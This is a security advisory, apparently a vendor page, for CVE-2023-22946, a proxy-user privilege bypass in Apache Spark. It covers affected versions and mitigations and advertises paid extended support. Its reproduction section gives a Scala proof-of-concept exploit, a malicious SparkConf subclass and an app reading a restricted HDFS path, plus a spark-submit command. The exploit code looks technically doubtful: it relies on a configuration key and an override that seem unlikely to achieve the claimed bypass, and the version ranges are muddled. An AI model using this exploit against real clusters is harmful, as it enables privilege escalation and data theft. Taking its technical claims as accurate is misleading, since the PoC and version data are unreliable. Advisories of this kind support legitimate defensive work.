CVE-2023-22946

Broken Access Control
Affects: Apache Spark <3.4.0, >=3.3.0 <=3.3.1, >=3.2.0 <=3.2.3, >=3.1.0 <=3.1.3, >=3.0.0 <=3.0.3, >=2.4.8
Patch Available

This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

Apache Spark is an open-source, distributed computing framework designed for big data processing and analytics, offering high-speed performance through in-memory computation and a unified engine for diverse workloads like batch processing, streaming, and machine learning.

With this exploit, a malicious user who has access to the proxy-user feature can place malicious configuration-related classes on the application classpath, causing code to execute with the privileges of the submitting user rather than the restricted privileges of the proxy user.

Broken Access Control occurs when an application fails to properly enforce restrictions on what authenticated users are allowed to do, enabling attackers to access unauthorized functionality, data, or resources. It often stems from inadequate validation of user permissions, allowing someone to bypass intended security boundaries and perform actions beyond their assigned role.
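As a purely illustrative sketch (the User model and JobService below are hypothetical and unrelated to Spark's actual APIs), the difference between broken and enforced access control often comes down to a single missing server-side check:

// Hypothetical types, invented only to illustrate the vulnerability class
case class User(name: String, roles: Set[String])

object JobService {
  // Broken access control: the privileged action never verifies the caller's role
  def purgeAllJobsUnsafe(user: User): Unit =
    println(s"${user.name} purged every job")

  // Enforced access control: the permission check happens before the action
  def purgeAllJobs(user: User): Either[String, Unit] =
    if (user.roles.contains("admin")) Right(println(s"${user.name} purged every job"))
    else Left(s"${user.name} is not authorized to purge jobs")
}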

Any of the following ramifications are possible:

  • Allowing arbitrary code execution
  • Complete system compromise
  • Data theft or exposure
  • Data manipulation or destruction
  • Privilege escalation
  • Denial of service

Details

Module Info

Product: Apache Spark

Affected packages: Apache Spark

Affected versions:

<3.4.0
>=3.3.0 <=3.3.1
>=3.2.0 <=3.2.3
>=3.1.0 <=3.1.3
>=3.0.0 <=3.0.3
>=2.4.8 

GitHub Repo: N/A

Published packages: N/A

Package manager: N/A

Vulnerability Info

This critical-severity vulnerability is found in the core Apache Spark package.
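
A quick way to confirm whether a given deployment falls inside the affected ranges listed above is to print the running Spark version from a trivial job; a minimal sketch (the object name is ours):

import org.apache.spark.sql.SparkSession

object SparkVersionCheck {
  def main(args: Array[String]): Unit = {
    val spark = SparkSession.builder().appName("SparkVersionCheck").getOrCreate()
    // Anything below 3.4.0 falls inside the affected ranges listed above
    println(s"Running Spark ${spark.version}")
    spark.stop()
  }
}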

Steps To Reproduce

  1. Set up an Apache Spark environment running a version vulnerable to this exploit, such as 3.3.1.
  2. Ensure the cluster supports the proxy-user feature and verify that spark.submit.proxyUser.allowCustomClasspathInClusterMode is either unset (defaults to true in vulnerable versions) or explicitly set to true. This allows custom classpaths in cluster mode.
  3. Create a submitting user, say Alice, with higher privileges (e.g., a service account or admin) who is authorized to submit Spark jobs and impersonate other users.
  4. Create a proxy-user with limited privileges, say Bob (e.g., a regular user account with restricted access).
  5. Configure authentication (e.g., Kerberos or a simple security plugin) to allow Alice to submit jobs as Bob via the proxy-user feature.
  6. Write a simple Spark application that includes malicious configuration-related classes in the application’s JAR file. For example:
    • Create a class that overrides Spark’s internal configuration or security context handling (e.g., a subclass of SparkConf or a custom SecurityManager).
    • Design the class to bypass the proxy-user’s privilege restrictions, forcing the application to inherit the submitting user’s (Alice’s) privileges.
    • It will look something like this:
import org.apache.spark.SparkConf
import org.apache.spark.sql.SparkSession

// Malicious subclass of SparkConf to manipulate configuration
class MaliciousSparkConf extends SparkConf {
  override def get(key: String, defaultValue: String): String = {
    // Override security-related properties to bypass proxy-user restrictions
    if (key == "spark.proxy.user" || key == "spark.security.credentials.user") {
      // Force the configuration to use the submitting user's identity (e.g., "alice")
      // instead of the proxy-user (e.g., "bob")
      System.getProperty("user.name") // Returns submitting user's name
    } else {
      super.get(key, defaultValue)
    }
  }

  override def set(key: String, value: String): SparkConf = {
    // Prevent proxy-user settings from being applied correctly
    if (key != "spark.proxy.user") {
      super.set(key, value)
    } else {
      super.set(key, System.getProperty("user.name")) // Override with submitting user
    }
  }
}

// Main application to exploit the vulnerability
object MaliciousApp {
  def main(args: Array[String]): Unit = {
    // Create the malicious configuration
    val conf = new MaliciousSparkConf()
      .setAppName("MaliciousApp")
      .setMaster("spark://<master-url>:7077") // Replace with your cluster master URL

    // Initialize SparkSession with the tampered configuration
    val spark = SparkSession.builder()
      .config(conf)
      .getOrCreate()

    try {
      // Test the effective privileges by performing an action
      val currentUser = System.getProperty("user.name")
      println(s"Running as user: $currentUser")

      // Example: Write to a file or perform an action only the submitting user can do
      spark.sparkContext.textFile("hdfs://<path-only-alice-can-access>")
        .saveAsTextFile("hdfs://<output-path>")

      println("Successfully executed with elevated privileges!")
    } catch {
      case e: Exception => println(s"Error (possibly due to privilege check): ${e.getMessage}")
    } finally {
      spark.stop()
    }
  }
}

  7. Use the spark-submit command to launch the application in cluster mode, specifying the proxy-user and including the malicious JAR in the classpath:
spark-submit --class com.example.MaliciousApp \
             --master spark://<master-url> \
             --proxy-user bob \
             --jars malicious-app.jar \
             malicious-app.jar

  8. Ensure the submission is done as the submitting user (Alice), either by running as Alice or by using a tool like Livy that supports proxy-user submissions.
  9. Verify the exploit by running the job and checking the output. If successful, the application executes with Alice’s privileges (the submitting user) instead of Bob’s (the proxy-user), despite the --proxy-user bob flag. A small identity-check sketch follows this list.
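
On Hadoop-backed clusters, the identity that actually governs HDFS access is tracked through Hadoop's UserGroupInformation rather than the JVM's user.name property, so a more direct verification is to log both from the driver. A minimal sketch (the object name is ours), assuming the Hadoop client libraries are on the classpath:

import org.apache.hadoop.security.UserGroupInformation

object EffectiveUserCheck {
  def main(args: Array[String]): Unit = {
    // OS-level user that launched the JVM
    val osUser = System.getProperty("user.name")
    // Hadoop-level effective user; with --proxy-user working as intended this should
    // report the proxy user (e.g. "bob") rather than the submitting user
    val effectiveUser = UserGroupInformation.getCurrentUser.getShortUserName
    println(s"OS user: $osUser, effective Hadoop user: $effectiveUser")
  }
}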

Addressing the Issue

Users of the affected components should apply one of the following mitigations; a brief configuration-check sketch follows the list:

  • Upgrade to a secure version of the software.
  • Sign up for post-EOL security support; HeroDevs customers get immediate access to a patched version of this software.
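
Where upgrading is not immediately possible and the spark.submit.proxyUser.allowCustomClasspathInClusterMode property is available (see step 2 above), operators typically pin it to false in spark-defaults.conf. The sketch below (our own, not part of the advisory) only reports the value the application sees:

import org.apache.spark.SparkConf

object ProxyUserClasspathCheck {
  def main(args: Array[String]): Unit = {
    // spark-defaults.conf settings are propagated to the driver, so a fresh SparkConf
    // reflects the configured value; "true" means custom classpaths are still honored
    // for proxy-user cluster-mode submissions
    val conf = new SparkConf()
    val allowed =
      conf.getBoolean("spark.submit.proxyUser.allowCustomClasspathInClusterMode", true)
    println(s"allowCustomClasspathInClusterMode = $allowed")
  }
}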

Credit(s)

  • Hideyuki Furue

Vulnerability Details

ID: CVE-2023-22946

Project affected: Apache Spark

Versions affected: <3.4.0, >=3.3.0 <=3.3.1, >=3.2.0 <=3.2.3, >=3.1.0 <=3.1.3, >=3.0.0 <=3.0.3, >=2.4.8

Published date: April 9, 2025

Fix date (approx.): April 17, 2023

Severity: Critical

Category: Broken Access Control